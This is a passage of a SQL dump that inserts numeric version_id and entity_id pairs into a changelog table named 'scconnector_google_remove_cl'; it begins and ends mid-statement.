(11844, 1457),
(11845, 1457),
(11846, 1457),
(11847, 1458),
(11848, 1458),
(11849, 1458),
(11850, 1458),
(11851, 1458),
(11852, 1458),
(11853, 1459),
(11854, 1459),
(11855, 1459),
(11856, 1459),
(11857, 1459),
(11858, 1459),
(11859, 1460),
(11860, 1461),
(11861, 1462),
(11862, 1463),
(11863, 1464),
(11864, 1465),
(11865, 1466),
(11866, 1467),
(11867, 1468),
(11868, 1469),
(11869, 1470),
(11870, 1471),
(11871, 1472),
(11872, 1473),
(11873, 1474),
(11874, 1475),
(11875, 1476),
(11876, 1477),
(11877, 1478),
(11878, 1479),
(11879, 1480),
(11880, 1481),
(11881, 1482),
(11882, 1483),
(11883, 1484),
(11884, 1485),
(11885, 1486),
(11886, 1487),
(11887, 1488),
(11888, 1489),
(11889, 1490),
(11890, 1491),
(11891, 1492),
(11892, 1493),
(11893, 1494),
(11894, 1495),
(11895, 1496),
(11896, 1497),
(11897, 1498),
(11898, 1499),
(11899, 1500),
(11900, 1501),
(11901, 1502),
(11902, 1503),
(11903, 1504),
(11904, 1505),
(11905, 1506),
(11906, 1507),
(11907, 1508),
(11908, 1509),
(11909, 1510),
(11910, 1511),
(11911, 1512),
(11912, 1513),
(11913, 1514),
(11914, 1515),
(11915, 1516),
(11916, 1517),
(11917, 1518),
(11918, 1519),
(11919, 1520),
(11920, 1521),
(11921, 1522),
(11922, 1523),
(11923, 1524),
(11924, 1525),
(11925, 1526),
(11926, 1527),
(11927, 1528),
(11928, 1529),
(11929, 1530),
(11930, 1531),
(11931, 1532),
(11932, 1533),
(11933, 1534),
(11934, 1535),
(11935, 1536),
(11936, 1537),
(11937, 1538),
(11938, 1539),
(11939, 1540),
(11940, 1541),
(11941, 1542),
(11942, 1543),
(11943, 1544),
(11944, 1545),
(11945, 1546),
(11946, 1547),
(11947, 1548),
(11948, 1549),
(11949, 1550),
(11950, 1551),
(11951, 1552),
(11952, 1553),
(11953, 1554),
(11954, 1555),
(11955, 1556),
(11956, 1557),
(11957, 1558),
(11958, 1559),
(11959, 1460),
(11960, 1461),
(11961, 1462),
(11962, 1463),
(11963, 1464),
(11964, 1465),
(11965, 1466),
(11966, 1467),
(11967, 1468),
(11968, 1469),
(11969, 1470),
(11970, 1471),
(11971, 1472),
(11972, 1473),
(11973, 1474),
(11974, 1475),
(11975, 1476),
(11976, 1477),
(11977, 1478),
(11978, 1479),
(11979, 1480),
(11980, 1481),
(11981, 1482),
(11982, 1483),
(11983, 1484),
(11984, 1485),
(11985, 1486),
(11986, 1487),
(11987, 1488),
(11988, 1489),
(11989, 1490),
(11990, 1491),
(11991, 1492),
(11992, 1493),
(11993, 1494),
(11994, 1495),
(11995, 1496),
(11996, 1497),
(11997, 1498),
(11998, 1499),
(11999, 1500),
(12000, 1501),
(12001, 1502),
(12002, 1503),
(12003, 1504),
(12004, 1505),
(12005, 1506),
(12006, 1507),
(12007, 1508),
(12008, 1509),
(12009, 1510),
(12010, 1511),
(12011, 1512),
(12012, 1513),
(12013, 1514),
(12014, 1515),
(12015, 1516),
(12016, 1517),
(12017, 1518),
(12018, 1519),
(12019, 1520),
(12020, 1521),
(12021, 1522),
(12022, 1523),
(12023, 1524),
(12024, 1525),
(12025, 1526),
(12026, 1527),
(12027, 1528),
(12028, 1529),
(12029, 1530),
(12030, 1531),
(12031, 1532),
(12032, 1533),
(12033, 1534),
(12034, 1535),
(12035, 1536),
(12036, 1537),
(12037, 1538),
(12038, 1539),
(12039, 1540),
(12040, 1541),
(12041, 1542),
(12042, 1543),
(12043, 1544),
(12044, 1545),
(12045, 1546),
(12046, 1547),
(12047, 1548),
(12048, 1549),
(12049, 1550),
(12050, 1551),
(12051, 1552),
(12052, 1553),
(12053, 1554),
(12054, 1555),
(12055, 1556),
(12056, 1557),
(12057, 1558),
(12058, 1559),
(12059, 1460),
(12060, 1460),
(12061, 1460),
(12062, 1460),
(12063, 1460),
(12064, 1460),
(12065, 1461),
(12066, 1461),
(12067, 1461),
(12068, 1461),
(12069, 1461),
(12070, 1461),
(12071, 1462),
(12072, 1462),
(12073, 1462),
(12074, 1462),
(12075, 1462),
(12076, 1462),
(12077, 1463),
(12078, 1463),
(12079, 1463),
(12080, 1463),
(12081, 1463),
(12082, 1463),
(12083, 1464),
(12084, 1464),
(12085, 1464),
(12086, 1464),
(12087, 1464),
(12088, 1464),
(12089, 1465),
(12090, 1465),
(12091, 1465),
(12092, 1465),
(12093, 1465),
(12094, 1465),
(12095, 1466),
(12096, 1466),
(12097, 1466),
(12098, 1466),
(12099, 1466),
(12100, 1466),
(12101, 1467),
(12102, 1467),
(12103, 1467),
(12104, 1467),
(12105, 1467),
(12106, 1467),
(12107, 1468),
(12108, 1468),
(12109, 1468),
(12110, 1468),
(12111, 1468),
(12112, 1468),
(12113, 1469),
(12114, 1469),
(12115, 1469),
(12116, 1469),
(12117, 1469),
(12118, 1469),
(12119, 1470),
(12120, 1470),
(12121, 1470),
(12122, 1470),
(12123, 1470),
(12124, 1470),
(12125, 1471),
(12126, 1471),
(12127, 1471),
(12128, 1471),
(12129, 1471),
(12130, 1471),
(12131, 1472),
(12132, 1472),
(12133, 1472),
(12134, 1472),
(12135, 1472),
(12136, 1472),
(12137, 1473),
(12138, 1473),
(12139, 1473),
(12140, 1473),
(12141, 1473),
(12142, 1473),
(12143, 1473),
(12144, 1473),
(12145, 1473),
(12146, 1474),
(12147, 1474),
(12148, 1474),
(12149, 1474),
(12150, 1474),
(12151, 1474),
(12152, 1475),
(12153, 1475),
(12154, 1475),
(12155, 1475),
(12156, 1475),
(12157, 1475),
(12158, 1476),
(12159, 1476),
(12160, 1476),
(12161, 1476),
(12162, 1476),
(12163, 1476),
(12164, 1477),
(12165, 1477),
(12166, 1477),
(12167, 1477),
(12168, 1477),
(12169, 1477),
(12170, 1478),
(12171, 1478),
(12172, 1478),
(12173, 1478),
(12174, 1478),
(12175, 1478),
(12176, 1479),
(12177, 1479),
(12178, 1479),
(12179, 1479),
(12180, 1479),
(12181, 1479),
(12182, 1480),
(12183, 1480),
(12184, 1480),
(12185, 1480),
(12186, 1480),
(12187, 1480),
(12188, 1481),
(12189, 1481),
(12190, 1481),
(12191, 1481),
(12192, 1481),
(12193, 1481),
(12194, 1482),
(12195, 1482),
(12196, 1482),
(12197, 1482),
(12198, 1482),
(12199, 1482),
(12200, 1483),
(12201, 1483),
(12202, 1483),
(12203, 1483),
(12204, 1483),
(12205, 1483),
(12206, 1484),
(12207, 1484),
(12208, 1484),
(12209, 1484),
(12210, 1484),
(12211, 1484),
(12212, 1485),
(12213, 1485),
(12214, 1485),
(12215, 1485),
(12216, 1485),
(12217, 1485),
(12218, 1486),
(12219, 1486),
(12220, 1486),
(12221, 1486),
(12222, 1486),
(12223, 1486),
(12224, 1487),
(12225, 1487),
(12226, 1487),
(12227, 1487),
(12228, 1487),
(12229, 1487),
(12230, 1488),
(12231, 1488),
(12232, 1488),
(12233, 1488),
(12234, 1488),
(12235, 1488),
(12236, 1489),
(12237, 1489),
(12238, 1489),
(12239, 1489),
(12240, 1489),
(12241, 1489),
(12242, 1489),
(12243, 1489),
(12244, 1489),
(12245, 1490),
(12246, 1490),
(12247, 1490),
(12248, 1490),
(12249, 1490),
(12250, 1490),
(12251, 1491),
(12252, 1491),
(12253, 1491),
(12254, 1491),
(12255, 1491),
(12256, 1491),
(12257, 1492),
(12258, 1492),
(12259, 1492),
(12260, 1492),
(12261, 1492),
(12262, 1492),
(12263, 1493),
(12264, 1493),
(12265, 1493),
(12266, 1493),
(12267, 1493),
(12268, 1493),
(12269, 1494),
(12270, 1494),
(12271, 1494),
(12272, 1494),
(12273, 1494),
(12274, 1494),
(12275, 1495),
(12276, 1495),
(12277, 1495),
(12278, 1495),
(12279, 1495),
(12280, 1495),
(12281, 1496),
(12282, 1496),
(12283, 1496),
(12284, 1496),
(12285, 1496),
(12286, 1496),
(12287, 1497),
(12288, 1497),
(12289, 1497),
(12290, 1497),
(12291, 1497),
(12292, 1497),
(12293, 1498),
(12294, 1498),
(12295, 1498),
(12296, 1498),
(12297, 1498),
(12298, 1498),
(12299, 1499),
(12300, 1499),
(12301, 1499),
(12302, 1499),
(12303, 1499),
(12304, 1499),
(12305, 1500),
(12306, 1500),
(12307, 1500),
(12308, 1500),
(12309, 1500),
(12310, 1500),
(12311, 1501),
(12312, 1501),
(12313, 1501),
(12314, 1501),
(12315, 1501),
(12316, 1501),
(12317, 1502),
(12318, 1502),
(12319, 1502),
(12320, 1502),
(12321, 1502),
(12322, 1502),
(12323, 1503),
(12324, 1503),
(12325, 1503),
(12326, 1503),
(12327, 1503),
(12328, 1503),
(12329, 1504),
(12330, 1504),
(12331, 1504),
(12332, 1504),
(12333, 1504),
(12334, 1504),
(12335, 1505),
(12336, 1505),
(12337, 1505),
(12338, 1505),
(12339, 1505),
(12340, 1505),
(12341, 1505),
(12342, 1505),
(12343, 1505),
(12344, 1506),
(12345, 1506),
(12346, 1506),
(12347, 1506),
(12348, 1506),
(12349, 1506),
(12350, 1507),
(12351, 1507),
(12352, 1507),
(12353, 1507),
(12354, 1507),
(12355, 1507),
(12356, 1508),
(12357, 1508),
(12358, 1508),
(12359, 1508),
(12360, 1508),
(12361, 1508),
(12362, 1509),
(12363, 1509),
(12364, 1509),
(12365, 1509),
(12366, 1509),
(12367, 1509),
(12368, 1510),
(12369, 1510),
(12370, 1510),
(12371, 1510),
(12372, 1510),
(12373, 1510),
(12374, 1511),
(12375, 1511),
(12376, 1511),
(12377, 1511),
(12378, 1511),
(12379, 1511),
(12380, 1512),
(12381, 1512),
(12382, 1512),
(12383, 1512),
(12384, 1512),
(12385, 1512),
(12386, 1513),
(12387, 1513),
(12388, 1513),
(12389, 1513),
(12390, 1513),
(12391, 1513),
(12392, 1514),
(12393, 1514),
(12394, 1514),
(12395, 1514),
(12396, 1514),
(12397, 1514),
(12398, 1515),
(12399, 1515),
(12400, 1515),
(12401, 1515),
(12402, 1515),
(12403, 1515),
(12404, 1516),
(12405, 1516),
(12406, 1516),
(12407, 1516),
(12408, 1516),
(12409, 1516),
(12410, 1517),
(12411, 1517),
(12412, 1517),
(12413, 1517),
(12414, 1517),
(12415, 1517),
(12416, 1518),
(12417, 1518),
(12418, 1518),
(12419, 1518),
(12420, 1518),
(12421, 1518),
(12422, 1519),
(12423, 1519),
(12424, 1519),
(12425, 1519),
(12426, 1519),
(12427, 1519),
(12428, 1520),
(12429, 1520),
(12430, 1520),
(12431, 1520),
(12432, 1520),
(12433, 1520),
(12434, 1521),
(12435, 1521),
(12436, 1521),
(12437, 1521),
(12438, 1521),
(12439, 1521),
(12440, 1521),
(12441, 1521),
(12442, 1521),
(12443, 1522),
(12444, 1522),
(12445, 1522),
(12446, 1522),
(12447, 1522),
(12448, 1522),
(12449, 1523),
(12450, 1523),
(12451, 1523),
(12452, 1523),
(12453, 1523),
(12454, 1523),
(12455, 1524),
(12456, 1524),
(12457, 1524),
(12458, 1524),
(12459, 1524),
(12460, 1524),
(12461, 1525),
(12462, 1525),
(12463, 1525),
(12464, 1525),
(12465, 1525),
(12466, 1525),
(12467, 1526),
(12468, 1526),
(12469, 1526),
(12470, 1526),
(12471, 1526),
(12472, 1526),
(12473, 1527),
(12474, 1527),
(12475, 1527),
(12476, 1527),
(12477, 1527),
(12478, 1527),
(12479, 1528),
(12480, 1528),
(12481, 1528),
(12482, 1528),
(12483, 1528),
(12484, 1528),
(12485, 1529),
(12486, 1529),
(12487, 1529),
(12488, 1529),
(12489, 1529),
(12490, 1529),
(12491, 1530),
(12492, 1530),
(12493, 1530),
(12494, 1530),
(12495, 1530),
(12496, 1530),
(12497, 1531),
(12498, 1531),
(12499, 1531),
(12500, 1531),
(12501, 1531),
(12502, 1531),
(12503, 1532),
(12504, 1532),
(12505, 1532),
(12506, 1532),
(12507, 1532),
(12508, 1532),
(12509, 1533),
(12510, 1533),
(12511, 1533),
(12512, 1533),
(12513, 1533),
(12514, 1533),
(12515, 1534),
(12516, 1534),
(12517, 1534),
(12518, 1534),
(12519, 1534),
(12520, 1534),
(12521, 1535),
(12522, 1535),
(12523, 1535),
(12524, 1535),
(12525, 1535),
(12526, 1535),
(12527, 1536),
(12528, 1536),
(12529, 1536),
(12530, 1536),
(12531, 1536),
(12532, 1536),
(12533, 1537),
(12534, 1537),
(12535, 1537),
(12536, 1537),
(12537, 1537),
(12538, 1537),
(12539, 1537),
(12540, 1537),
(12541, 1537),
(12542, 1538),
(12543, 1538),
(12544, 1538),
(12545, 1538),
(12546, 1538),
(12547, 1538),
(12548, 1539),
(12549, 1539),
(12550, 1539),
(12551, 1539),
(12552, 1539),
(12553, 1539),
(12554, 1540),
(12555, 1540),
(12556, 1540),
(12557, 1540),
(12558, 1540),
(12559, 1540),
(12560, 1541),
(12561, 1541),
(12562, 1541),
(12563, 1541),
(12564, 1541),
(12565, 1541),
(12566, 1542),
(12567, 1542),
(12568, 1542),
(12569, 1542),
(12570, 1542),
(12571, 1542),
(12572, 1543),
(12573, 1543),
(12574, 1543),
(12575, 1543),
(12576, 1543),
(12577, 1543),
(12578, 1544),
(12579, 1544),
(12580, 1544),
(12581, 1544),
(12582, 1544),
(12583, 1544),
(12584, 1545),
(12585, 1545),
(12586, 1545),
(12587, 1545),
(12588, 1545),
(12589, 1545),
(12590, 1546),
(12591, 1546),
(12592, 1546),
(12593, 1546),
(12594, 1546),
(12595, 1546),
(12596, 1547),
(12597, 1547),
(12598, 1547),
(12599, 1547),
(12600, 1547),
(12601, 1547),
(12602, 1548),
(12603, 1548),
(12604, 1548),
(12605, 1548),
(12606, 1548),
(12607, 1548),
(12608, 1549),
(12609, 1549),
(12610, 1549),
(12611, 1549),
(12612, 1549),
(12613, 1549),
(12614, 1550),
(12615, 1550),
(12616, 1550),
(12617, 1550),
(12618, 1550),
(12619, 1550),
(12620, 1551),
(12621, 1551),
(12622, 1551),
(12623, 1551),
(12624, 1551),
(12625, 1551),
(12626, 1552),
(12627, 1552),
(12628, 1552),
(12629, 1552),
(12630, 1552),
(12631, 1552),
(12632, 1553),
(12633, 1553),
(12634, 1553),
(12635, 1553),
(12636, 1553),
(12637, 1553),
(12638, 1553),
(12639, 1553),
(12640, 1553),
(12641, 1554),
(12642, 1554),
(12643, 1554),
(12644, 1554),
(12645, 1554),
(12646, 1554),
(12647, 1555),
(12648, 1555),
(12649, 1555),
(12650, 1555),
(12651, 1555),
(12652, 1555),
(12653, 1556),
(12654, 1556),
(12655, 1556),
(12656, 1556),
(12657, 1556),
(12658, 1556),
(12659, 1557),
(12660, 1557),
(12661, 1557),
(12662, 1557),
(12663, 1557),
(12664, 1557),
(12665, 1558),
(12666, 1558),
(12667, 1558),
(12668, 1558),
(12669, 1558),
(12670, 1558),
(12671, 1559),
(12672, 1559),
(12673, 1559),
(12674, 1559),
(12675, 1559),
(12676, 1559),
(12677, 1560),
(12678, 1561),
(12679, 1562),
(12680, 1563),
(12681, 1564),
(12682, 1565),
(12683, 1566),
(12684, 1567),
(12685, 1568),
(12686, 1569),
(12687, 1570),
(12688, 1571),
(12689, 1572),
(12690, 1573),
(12691, 1574),
(12692, 1575),
(12693, 1576),
(12694, 1577),
(12695, 1578),
(12696, 1579),
(12697, 1580),
(12698, 1581),
(12699, 1582),
(12700, 1583),
(12701, 1584),
(12702, 1585),
(12703, 1586),
(12704, 1587),
(12705, 1588),
(12706, 1589),
(12707, 1590),
(12708, 1591),
(12709, 1592),
(12710, 1593),
(12711, 1594),
(12712, 1595),
(12713, 1596),
(12714, 1597),
(12715, 1598),
(12716, 1599),
(12717, 1600),
(12718, 1601),
(12719, 1602),
(12720, 1603),
(12721, 1604),
(12722, 1605),
(12723, 1606),
(12724, 1607),
(12725, 1608),
(12726, 1609),
(12727, 1610),
(12728, 1611),
(12729, 1612),
(12730, 1613),
(12731, 1614),
(12732, 1615),
(12733, 1616),
(12734, 1617),
(12735, 1618),
(12736, 1619),
(12737, 1620),
(12738, 1621),
(12739, 1622),
(12740, 1623),
(12741, 1624),
(12742, 1625),
(12743, 1626),
(12744, 1627),
(12745, 1628),
(12746, 1629),
(12747, 1630),
(12748, 1631),
(12749, 1632),
(12750, 1633),
(12751, 1634),
(12752, 1635),
(12753, 1636),
(12754, 1637),
(12755, 1638),
(12756, 1639),
(12757, 1640),
(12758, 1641),
(12759, 1642),
(12760, 1643),
(12761, 1644),
(12762, 1645),
(12763, 1646),
(12764, 1647),
(12765, 1648),
(12766, 1649),
(12767, 1650),
(12768, 1651),
(12769, 1652),
(12770, 1653),
(12771, 1654),
(12772, 1655),
(12773, 1656),
(12774, 1657),
(12775, 1658),
(12776, 1659),
(12777, 1560),
(12778, 1561),
(12779, 1562),
(12780, 1563),
(12781, 1564),
(12782, 1565),
(12783, 1566),
(12784, 1567),
(12785, 1568),
(12786, 1569),
(12787, 1570),
(12788, 1571),
(12789, 1572),
(12790, 1573),
(12791, 1574),
(12792, 1575),
(12793, 1576),
(12794, 1577),
(12795, 1578),
(12796, 1579),
(12797, 1580),
(12798, 1581),
(12799, 1582),
(12800, 1583),
(12801, 1584),
(12802, 1585),
(12803, 1586),
(12804, 1587),
(12805, 1588),
(12806, 1589),
(12807, 1590),
(12808, 1591),
(12809, 1592),
(12810, 1593),
(12811, 1594),
(12812, 1595),
(12813, 1596),
(12814, 1597),
(12815, 1598),
(12816, 1599),
(12817, 1600),
(12818, 1601),
(12819, 1602),
(12820, 1603),
(12821, 1604),
(12822, 1605),
(12823, 1606),
(12824, 1607),
(12825, 1608),
(12826, 1609),
(12827, 1610),
(12828, 1611),
(12829, 1612),
(12830, 1613),
(12831, 1614),
(12832, 1615),
(12833, 1616),
(12834, 1617),
(12835, 1618),
(12836, 1619),
(12837, 1620),
(12838, 1621),
(12839, 1622),
(12840, 1623),
(12841, 1624),
(12842, 1625),
(12843, 1626),
(12844, 1627),
(12845, 1628),
(12846, 1629),
(12847, 1630),
(12848, 1631),
(12849, 1632),
(12850, 1633),
(12851, 1634),
(12852, 1635),
(12853, 1636),
(12854, 1637),
(12855, 1638),
(12856, 1639),
(12857, 1640),
(12858, 1641),
(12859, 1642),
(12860, 1643),
(12861, 1644),
(12862, 1645),
(12863, 1646),
(12864, 1647),
(12865, 1648),
(12866, 1649),
(12867, 1650),
(12868, 1651),
(12869, 1652),
(12870, 1653),
(12871, 1654),
(12872, 1655),
(12873, 1656),
(12874, 1657),
(12875, 1658),
(12876, 1659),
(12877, 1560),
(12878, 1560),
(12879, 1560),
(12880, 1560),
(12881, 1560),
(12882, 1560),
(12883, 1561),
(12884, 1561),
(12885, 1561),
(12886, 1561),
(12887, 1561),
(12888, 1561),
(12889, 1562),
(12890, 1562),
(12891, 1562),
(12892, 1562),
(12893, 1562),
(12894, 1562),
(12895, 1563),
(12896, 1563),
(12897, 1563),
(12898, 1563),
(12899, 1563),
(12900, 1563),
(12901, 1564),
(12902, 1564),
(12903, 1564),
(12904, 1564),
(12905, 1564),
(12906, 1564),
(12907, 1565),
(12908, 1565),
(12909, 1565),
(12910, 1565),
(12911, 1565),
(12912, 1565),
(12913, 1566),
(12914, 1566),
(12915, 1566),
(12916, 1566),
(12917, 1566),
(12918, 1566),
(12919, 1567),
(12920, 1567),
(12921, 1567),
(12922, 1567),
(12923, 1567),
(12924, 1567),
(12925, 1568),
(12926, 1568),
(12927, 1568),
(12928, 1568),
(12929, 1568),
(12930, 1568),
(12931, 1569),
(12932, 1569),
(12933, 1569),
(12934, 1569),
(12935, 1569),
(12936, 1569),
(12937, 1569),
(12938, 1569),
(12939, 1569),
(12940, 1570),
(12941, 1570),
(12942, 1570),
(12943, 1570),
(12944, 1570),
(12945, 1570),
(12946, 1571),
(12947, 1571),
(12948, 1571),
(12949, 1571),
(12950, 1571),
(12951, 1571),
(12952, 1572),
(12953, 1572),
(12954, 1572),
(12955, 1572),
(12956, 1572),
(12957, 1572),
(12958, 1573),
(12959, 1573),
(12960, 1573),
(12961, 1573),
(12962, 1573),
(12963, 1573),
(12964, 1574),
(12965, 1574),
(12966, 1574),
(12967, 1574),
(12968, 1574),
(12969, 1574),
(12970, 1575),
(12971, 1575),
(12972, 1575),
(12973, 1575),
(12974, 1575),
(12975, 1575),
(12976, 1576),
(12977, 1576),
(12978, 1576),
(12979, 1576),
(12980, 1576),
(12981, 1576),
(12982, 1577),
(12983, 1577),
(12984, 1577),
(12985, 1577),
(12986, 1577),
(12987, 1577),
(12988, 1578),
(12989, 1578),
(12990, 1578),
(12991, 1578),
(12992, 1578),
(12993, 1578),
(12994, 1579),
(12995, 1579),
(12996, 1579),
(12997, 1579),
(12998, 1579),
(12999, 1579),
(13000, 1580),
(13001, 1580),
(13002, 1580),
(13003, 1580),
(13004, 1580),
(13005, 1580),
(13006, 1581),
(13007, 1581),
(13008, 1581),
(13009, 1581),
(13010, 1581),
(13011, 1581),
(13012, 1582),
(13013, 1582),
(13014, 1582),
(13015, 1582),
(13016, 1582),
(13017, 1582),
(13018, 1583),
(13019, 1583),
(13020, 1583),
(13021, 1583),
(13022, 1583),
(13023, 1583),
(13024, 1584),
(13025, 1584),
(13026, 1584),
(13027, 1584),
(13028, 1584),
(13029, 1584),
(13030, 1585),
(13031, 1585),
(13032, 1585),
(13033, 1585),
(13034, 1585),
(13035, 1585),
(13036, 1585),
(13037, 1585),
(13038, 1585),
(13039, 1586),
(13040, 1586),
(13041, 1586),
(13042, 1586),
(13043, 1586),
(13044, 1586),
(13045, 1587),
(13046, 1587),
(13047, 1587),
(13048, 1587),
(13049, 1587),
(13050, 1587),
(13051, 1588),
(13052, 1588),
(13053, 1588),
(13054, 1588),
(13055, 1588),
(13056, 1588),
(13057, 1589),
(13058, 1589),
(13059, 1589),
(13060, 1589),
(13061, 1589);
INSERT INTO `scconnector_google_remove_cl` (`version_id`, `entity_id`) VALUES
(13062, 1589),
(13063, 1590),
(13064, 1590),
(13065, 1590),
(13066, 1590),
(13067, 1590),
(13068, 1590),
(13069, 1591),
(13070, 1591),
(13071, 1591),
(13072, 1591),
(13073, 1591),
(13074, 1591),
(13075, 1592),
(13076, 1592),
(13077, 1592),
(13078, 1592),
(13079, 1592),
(13080, 1592),
(13081, 1593),
(13082, 1593),
(13083, 1593),
(13084, 1593),
(13085, 1593),
(13086, 1593),
(13087, 1594),
(13088, 1594),
(13089, 1594),
(13090, 1594),
(13091, 1594),
(13092, 1594),
(13093, 1595),
(13094, 1595),
(13095, 1595),
(13096, 1595),
(13097, 1595),
(13098, 1595),
(13099, 1596),
(13100, 1596),
(13101, 1596),
(13102, 1596),
(13103, 1596),
(13104, 1596),
(13105, 1597),
(13106, 1597),
(13107, 1597),
(13108, 1597),
(13109, 1597),
(13110, 1597),
(13111, 1598),
(13112, 1598),
(13113, 1598),
(13114, 1598),
(13115, 1598),
(13116, 1598),
(13117, 1599),
(13118, 1599),
(13119, 1599),
(13120, 1599),
(13121, 1599),
(13122, 1599),
(13123, 1600),
(13124, 1600),
(13125, 1600),
(13126, 1600),
(13127, 1600),
(13128, 1600),
(13129, 1601),
(13130, 1601),
(13131, 1601),
(13132, 1601),
(13133, 1601),
(13134, 1601),
(13135, 1601),
(13136, 1601),
(13137, 1601),
(13138, 1602),
(13139, 1602),
(13140, 1602),
(13141, 1602),
(13142, 1602),
(13143, 1602),
(13144, 1603),
(13145, 1603),
(13146, 1603),
(13147, 1603),
(13148, 1603),
(13149, 1603),
(13150, 1604),
(13151, 1604),
(13152, 1604),
(13153, 1604),
(13154, 1604),
(13155, 1604),
(13156, 1605),
(13157, 1605),
(13158, 1605),
(13159, 1605),
(13160, 1605),
(13161, 1605),
(13162, 1606),
(13163, 1606),
(13164, 1606),
(13165, 1606),
(13166, 1606),
(13167, 1606),
(13168, 1607),
(13169, 1607),
(13170, 1607),
(13171, 1607),
(13172, 1607),
(13173, 1607),
(13174, 1608),
(13175, 1608),
(13176, 1608),
(13177, 1608),
(13178, 1608),
(13179, 1608),
(13180, 1609),
(13181, 1609),
(13182, 1609),
(13183, 1609),
(13184, 1609),
(13185, 1609),
(13186, 1610),
(13187, 1610),
(13188, 1610),
(13189, 1610),
(13190, 1610),
(13191, 1610),
(13192, 1611),
(13193, 1611),
(13194, 1611),
(13195, 1611),
(13196, 1611),
(13197, 1611),
(13198, 1612),
(13199, 1612),
(13200, 1612),
(13201, 1612),
(13202, 1612),
(13203, 1612),
(13204, 1613),
(13205, 1613),
(13206, 1613),
(13207, 1613),
(13208, 1613),
(13209, 1613),
(13210, 1614),
(13211, 1614),
(13212, 1614),
(13213, 1614),
(13214, 1614),
(13215, 1614),
(13216, 1615),
(13217, 1615),
(13218, 1615),
(13219, 1615),
(13220, 1615),
(13221, 1615),
(13222, 1616),
(13223, 1616),
(13224, 1616),
(13225, 1616),
(13226, 1616),
(13227, 1616),
(13228, 1617),
(13229, 1617),
(13230, 1617),
(13231, 1617),
(13232, 1617),
(13233, 1617),
(13234, 1617),
(13235, 1617),
(13236, 1617),
(13237, 1618),
(13238, 1618),
(13239, 1618),
(13240, 1618),
(13241, 1618),
(13242, 1618),
(13243, 1619),
(13244, 1619),
(13245, 1619),
(13246, 1619),
(13247, 1619),
(13248, 1619),
(13249, 1620),
(13250, 1620),
(13251, 1620),
(13252, 1620),
(13253, 1620),
(13254, 1620),
(13255, 1621),
(13256, 1621),
(13257, 1621),
(13258, 1621),
(13259, 1621),
(13260, 1621),
(13261, 1622),
(13262, 1622),
(13263, 1622),
(13264, 1622),
(13265, 1622),
(13266, 1622),
(13267, 1623),
(13268, 1623),
(13269, 1623),
(13270, 1623),
(13271, 1623),
(13272, 1623),
(13273, 1624),
(13274, 1624),
(13275, 1624),
(13276, 1624),
(13277, 1624),
(13278, 1624),
(13279, 1625),
(13280, 1625),
(13281, 1625),
(13282, 1625),
(13283, 1625),
(13284, 1625),
(13285, 1626),
(13286, 1626),
(13287, 1626),
(13288, 1626),
(13289, 1626),
(13290, 1626),
(13291, 1627),
(13292, 1627),
(13293, 1627),
(13294, 1627),
(13295, 1627),
(13296, 1627),
(13297, 1628),
(13298, 1628),
(13299, 1628),
(13300, 1628),
(13301, 1628),
(13302, 1628),
(13303, 1629),
(13304, 1629),
(13305, 1629),
(13306, 1629),
(13307, 1629),
(13308, 1629),
(13309, 1630),
(13310, 1630),
(13311, 1630),
(13312, 1630),
(13313, 1630),
(13314, 1630),
(13315, 1631),
(13316, 1631),
(13317, 1631),
(13318, 1631),
(13319, 1631),
(13320, 1631),
(13321, 1632),
(13322, 1632),
(13323, 1632),
(13324, 1632),
(13325, 1632),
(13326, 1632),
(13327, 1633),
(13328, 1633),
(13329, 1633),
(13330, 1633),
(13331, 1633),
(13332, 1633),
(13333, 1633),
(13334, 1633),
(13335, 1633),
(13336, 1634),
(13337, 1634),
(13338, 1634),
(13339, 1634),
(13340, 1634),
(13341, 1634),
(13342, 1635),
(13343, 1635),
(13344, 1635),
(13345, 1635),
(13346, 1635),
(13347, 1635),
(13348, 1636),
(13349, 1636),
(13350, 1636),
(13351, 1636),
(13352, 1636),
(13353, 1636),
(13354, 1637),
(13355, 1637),
(13356, 1637),
(13357, 1637),
(13358, 1637),
(13359, 1637),
(13360, 1638),
(13361, 1638),
(13362, 1638),
(13363, 1638),
(13364, 1638),
(13365, 1638),
(13366, 1639),
(13367, 1639),
(13368, 1639),
(13369, 1639),
(13370, 1639),
(13371, 1639),
(13372, 1640),
(13373, 1640),
(13374, 1640),
(13375, 1640),
(13376, 1640),
(13377, 1640),
(13378, 1641),
(13379, 1641),
(13380, 1641),
(13381, 1641),
(13382, 1641),
(13383, 1641),
(13384, 1642),
(13385, 1642),
(13386, 1642),
(13387, 1642),
(13388, 1642),
(13389, 1642),
(13390, 1643),
(13391, 1643),
(13392, 1643),
(13393, 1643),
(13394, 1643),
(13395, 1643),
(13396, 1644),
(13397, 1644),
(13398, 1644),
(13399, 1644),
(13400, 1644),
(13401, 1644),
(13402, 1645),
(13403, 1645),
(13404, 1645),
(13405, 1645),
(13406, 1645),
(13407, 1645),
(13408, 1646),
(13409, 1646),
(13410, 1646),
(13411, 1646),
(13412, 1646),
(13413, 1646),
(13414, 1647),
(13415, 1647),
(13416, 1647),
(13417, 1647),
(13418, 1647),
(13419, 1647),
(13420, 1648),
(13421, 1648),
(13422, 1648),
(13423, 1648),
(13424, 1648),
(13425, 1648),
(13426, 1649),
(13427, 1649),
(13428, 1649),
(13429, 1649),
(13430, 1649),
(13431, 1649),
(13432, 1649),
(13433, 1649),
(13434, 1649),
(13435, 1650),
(13436, 1650),
(13437, 1650),
(13438, 1650),
(13439, 1650),
(13440, 1650),
(13441, 1651),
(13442, 1651),
(13443, 1651),
(13444, 1651),
(13445, 1651),
(13446, 1651),
(13447, 1652),
(13448, 1652),
(13449, 1652),
(13450, 1652),
(13451, 1652),
(13452, 1652),
(13453, 1653),
(13454, 1653),
(13455, 1653),
(13456, 1653),
(13457, 1653),
(13458, 1653),
(13459, 1654),
(13460, 1654),
(13461, 1654),
(13462, 1654),
(13463, 1654),
(13464, 1654),
(13465, 1655),
(13466, 1655),
(13467, 1655),
(13468, 1655),
(13469, 1655),
(13470, 1655),
(13471, 1656),
(13472, 1656),
(13473, 1656),
(13474, 1656),
(13475, 1656),
(13476, 1656),
(13477, 1657),
(13478, 1657),
(13479, 1657),
(13480, 1657),
(13481, 1657),
(13482, 1657),
(13483, 1658),
(13484, 1658),
(13485, 1658),
(13486, 1658),
(13487, 1658),
(13488, 1658),
(13489, 1659),
(13490, 1659),
(13491, 1659),
(13492, 1659),
(13493, 1659),
(13494, 1659),
(13495, 1660),
(13496, 1661),
(13497, 1662),
(13498, 1663),
(13499, 1664),
(13500, 1665),
(13501, 1666),
(13502, 1667),
(13503, 1668),
(13504, 1669),
(13505, 1670),
